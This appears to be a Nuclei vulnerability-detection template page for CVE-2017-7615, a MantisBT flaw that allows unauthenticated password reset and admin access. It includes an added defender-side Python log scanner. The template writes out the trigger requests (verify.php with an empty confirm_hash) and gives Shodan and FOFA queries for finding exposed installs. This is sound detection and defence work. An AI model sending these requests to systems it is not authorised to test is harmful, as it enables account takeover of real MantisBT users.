MantisBT <=2.30 - Arbitrary Password Reset/Admin Access
ID: CVE-2017-7615
Severity: high
Author: bp0lr,dwisiswant0
Tags: cve,cve2017,mantisbt,unauth,edb
Description
MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
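A defender-side check for the request pattern described above, added here as an example that is not part of the original template or of MantisBT: it scans web server access logs for requests to verify.php whose confirm_hash parameter is present but empty. The Combined Log Format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Combined Log Format, e.g.
# ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Apr/2017:10:01:02 +0000] "GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1" 200 5120 "-" "curl/7.52"',
    '192.0.2.10 - - [16/Apr/2017:10:01:05 +0000] "GET /bugs/verify.php?confirm_hash=&id=2 HTTP/1.1" 302 0 "-" "curl/7.52"',
    '198.51.100.7 - - [16/Apr/2017:10:02:00 +0000] "GET /verify.php?id=5&confirm_hash=Zk3vQx HTTP/1.1" 200 5090 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Apr/2017:10:02:09 +0000] "GET /view.php?id=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

def find_empty_confirm_hash(lines):
    """Return one dict per verify.php request whose confirm_hash is present but empty."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m["target"])
        # Match on the script name so any install prefix (/mantis/, /bugs/, ...) is covered.
        if url.path.rsplit("/", 1)[-1].lower() != "verify.php":
            continue
        # keep_blank_values=True is essential: by default parse_qs drops "confirm_hash=".
        params = parse_qs(url.query, keep_blank_values=True)
        values = params.get("confirm_hash")
        if values is None or any(values):
            continue  # parameter absent, or a non-empty token was supplied
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "user_id": params.get("id", [""])[0],
            "status": int(m["status"]),
            # A 200 means the server rendered a page instead of rejecting the request.
            "served": m["status"] == "200",
        })
    return hits

if __name__ == "__main__":
    for hit in find_empty_confirm_hash(SAMPLE_LOG):
        print(hit)
```

Hits with `served` set to true are the ones to triage first, since the template's own matcher also requires a 200 response.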
YAML Source
id: CVE-2017-7615

# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.
# This template works by guessing user ID.
# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].

info:
  name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access
  author: bp0lr,dwisiswant0
  severity: high
  description: |
    MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized password resets and unauthorized administrative access.
  remediation: |
    Upgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability.
  reference:
    - https://sourceforge.net/projects/mantisbt/files/mantis-stable/
    - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
    - https://www.exploit-db.com/exploits/41890
    - http://www.openwall.com/lists/oss-security/2017/04/16/2
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7615
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-7615
    cwe-id: CWE-640
    epss-score: 0.97404
    epss-percentile: 0.99923
    cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: mantisbt
    product: mantisbt
    shodan-query:
      - http.favicon.hash:662709064
      - cpe:"cpe:2.3:a:mantisbt:mantisbt"
    fofa-query: icon_hash=662709064
  tags: cve,cve2017,mantisbt,unauth,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"

    stop-at-first-match: true

    # Both conditions must hold: the account update form is present and the status is 200.
    matchers-condition: and
    matchers:
      # Regex matcher, because the token value below is a pattern rather than a literal string.
      - type: regex
        part: body
        regex:
          - "<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""

      - type: status
        status:
          - 200
# digest: 4a0a00473045022011d60284f63fcd0f3c7e6707492f665f4b1a52793a2f47c088fafcc937deb43d022100d744faaeb587b997408de4b992b39dbd75ecd497555986dad5ee7daa62c9315c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-7615.yaml"